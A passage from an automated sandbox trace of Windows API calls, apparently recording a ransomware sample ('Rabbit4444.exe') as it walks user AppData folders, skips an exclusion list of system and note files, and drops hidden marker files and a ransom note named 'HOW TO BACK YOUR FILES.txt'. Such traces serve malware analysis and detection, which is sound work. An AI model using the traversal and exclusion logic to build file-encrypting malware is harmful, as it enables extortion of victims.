lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x833d38ba, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x377598d9, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf03cb335, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0065.292] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.292] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.292] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.292] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.292] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x833d38ba, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x377598d9, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf03cb335, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.292] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.292] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.292] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.292] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.292] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.292] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf03cb335, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf03cb335, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf03cb335, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.292] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.292] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.292] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x833d38ba, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd107f5ea, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x833d38ba, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0065.292] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.292] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.292] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0065.292] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0065.292] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0065.292] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0065.292] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0065.292] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0065.292] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0065.292] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0065.292] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0065.292] lstrcpyW (in: lpString1=0x130ebfc, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0065.292] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0065.293] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fa0 [0065.293] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd8) returned 0x11bb28 [0065.293] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fa8 | out: ListHead=0xf68b0, ListEntry=0x121fa8) returned 0x11cd68 [0065.293] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x833d38ba, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd107f9e7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x833d38ba, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0065.293] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.293] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.293] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0065.293] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0065.293] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0065.293] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0065.293] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0065.293] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0065.293] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0065.293] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0065.293] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0065.293] lstrcpyW (in: lpString1=0x130ebfc, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0065.293] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0065.294] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0065.294] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xdc) returned 0x125ae0 [0065.294] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x121fa8 [0065.294] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x833d38ba, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd107fe0f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x833d38ba, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0065.294] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.294] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.294] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0065.294] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0065.294] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0065.294] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0065.294] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0065.294] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0065.294] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0065.294] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0065.295] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0065.295] lstrcpyW (in: lpString1=0x130ebfc, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0065.295] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0065.295] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0065.295] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xdc) returned 0x125828 [0065.295] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x122108 [0065.295] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833d38ba, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd108027c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x833d38ba, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0065.295] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.295] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.295] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0065.295] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0065.295] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0065.295] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0065.295] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0065.295] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0065.295] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0065.295] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0065.295] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0065.295] lstrcpyW (in: lpString1=0x130ebfc, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0065.295] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0065.295] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xce) returned 0x108688 [0065.296] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x122268 [0065.296] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833d38ba, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd108027c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x833d38ba, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0065.296] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0065.296] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.296] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.296] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.296] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.297] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.297] CloseHandle (hObject=0x2cc) returned 1 [0065.297] CloseHandle (hObject=0x2a0) returned 1 [0065.297] GetCurrentThreadId () returned 0xd98 [0065.297] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0065.297] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp" [0065.297] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0065.297] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0065.297] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp" [0065.297] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp\\" [0065.297] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0065.297] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.298] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.301] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.302] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.302] CloseHandle (hObject=0x2a0) returned 1 [0065.302] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp") returned 102 [0065.302] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.302] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833d38ba, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd108027c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf03f166f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0065.302] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.302] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.302] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.302] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.303] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833d38ba, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd108027c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf03f166f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.303] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.303] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.303] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.303] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.303] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.303] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf03f166f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf03f166f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf03f166f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.303] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.303] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.303] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf03f166f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf03f166f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf03f166f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.303] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0065.303] lstrcpyW (in: lpString1=0x130ec06, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.303] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.304] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.304] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.304] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.304] CloseHandle (hObject=0x2cc) returned 1 [0065.304] CloseHandle (hObject=0x2a0) returned 1 [0065.305] GetCurrentThreadId () returned 0xd98 [0065.305] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0065.305] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory" [0065.305] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x125828 | out: hHeap=0xe0000) returned 1 [0065.305] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0065.305] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory" [0065.305] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory\\" [0065.305] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0065.305] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.311] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.313] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.314] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.314] CloseHandle (hObject=0x2a0) returned 1 [0065.315] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory") returned 109 [0065.315] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.315] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x833d38ba, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd107fe0f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf03f166f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0065.315] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.315] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.315] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.315] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.315] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x833d38ba, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd107fe0f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf03f166f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.315] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.315] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.315] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.315] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.315] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.315] FindNextFileW (in: hFindFile=0x102510, 